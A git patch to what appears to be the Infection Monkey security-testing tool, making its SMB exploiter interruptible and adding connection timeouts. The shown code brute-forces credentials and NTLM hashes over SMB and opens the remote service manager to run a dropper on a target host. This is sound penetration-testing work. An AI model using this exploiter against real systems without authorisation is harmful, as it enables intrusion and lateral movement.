From ed817feaf26e372ea8969cbcd1cdc5e9e6b9644e Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Mon, 21 Mar 2022 14:11:21 -0400 Subject: [PATCH] Agent: Make SMBExploiter interruptible --- monkey/infection_monkey/exploit/smbexec.py | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py index 31a8dbb53..72cc1a6cb 100644 --- a/monkey/infection_monkey/exploit/smbexec.py +++ b/monkey/infection_monkey/exploit/smbexec.py @@ -3,6 +3,7 @@ from logging import getLogger from impacket.dcerpc.v5 import scmr, transport from impacket.dcerpc.v5.scmr import DCERPCSessionError +from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.utils.attack_utils import ScanStatus, UsageEnum from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.tools.helpers import get_agent_dest_path @@ -14,6 +15,7 @@ from infection_monkey.utils.brute_force import ( get_credential_string, ) from infection_monkey.utils.commands import build_monkey_commandline +from infection_monkey.utils.threading import interruptable_iter logger = getLogger(__name__) @@ -33,7 +35,7 @@ class SMBExploiter(HostExploiter): dest_path = get_agent_dest_path(self.host, self.options) creds = generate_brute_force_combinations(self.options["credentials"]) - for user, password, lm_hash, ntlm_hash in creds: + for user, password, lm_hash, ntlm_hash in interruptable_iter(creds, self.interrupt): creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash]) try: @@ -76,8 +78,12 @@ class SMBExploiter(HostExploiter): continue if not self.exploit_result.exploitation_success: - logger.debug("Exploiter SmbExec is giving up...") - self.exploit_result.error_message = "Failed to authenticate to the victim over SMB" + if self._is_interrupted(): + self._set_interrupted() + else: + logger.debug("Exploiter SmbExec is giving up...") + self.exploit_result.error_message = "Failed to authenticate to the victim over SMB" + return self.exploit_result # execute the remote dropper in case the path isn't final @@ -94,9 +100,10 @@ class SMBExploiter(HostExploiter): "monkey_path": remote_full_path } + build_monkey_commandline(self.host, self.current_depth - 1) - smb_conn = False + smb_conn = None for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,)) + rpctransport.set_connect_timeout(LONG_REQUEST_TIMEOUT) rpctransport.set_dport(port) rpctransport.setRemoteHost(self.host.ip_addr) if hasattr(rpctransport, "set_credentials"): @@ -116,6 +123,7 @@ class SMBExploiter(HostExploiter): logger.debug(f"Connected to SCM on exploited machine {self.host}, port {port}") smb_conn = rpctransport.get_smb_connection() + smb_conn.setTimeout(LONG_REQUEST_TIMEOUT) break if not smb_conn: @@ -126,9 +134,6 @@ class SMBExploiter(HostExploiter): return self.exploit_result - # TODO: We DO want to deal with timeouts - # We don't wanna deal with timeouts from now on. - smb_conn.setTimeout(100000) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(scmr_rpc) sc_handle = resp["lpScHandle"]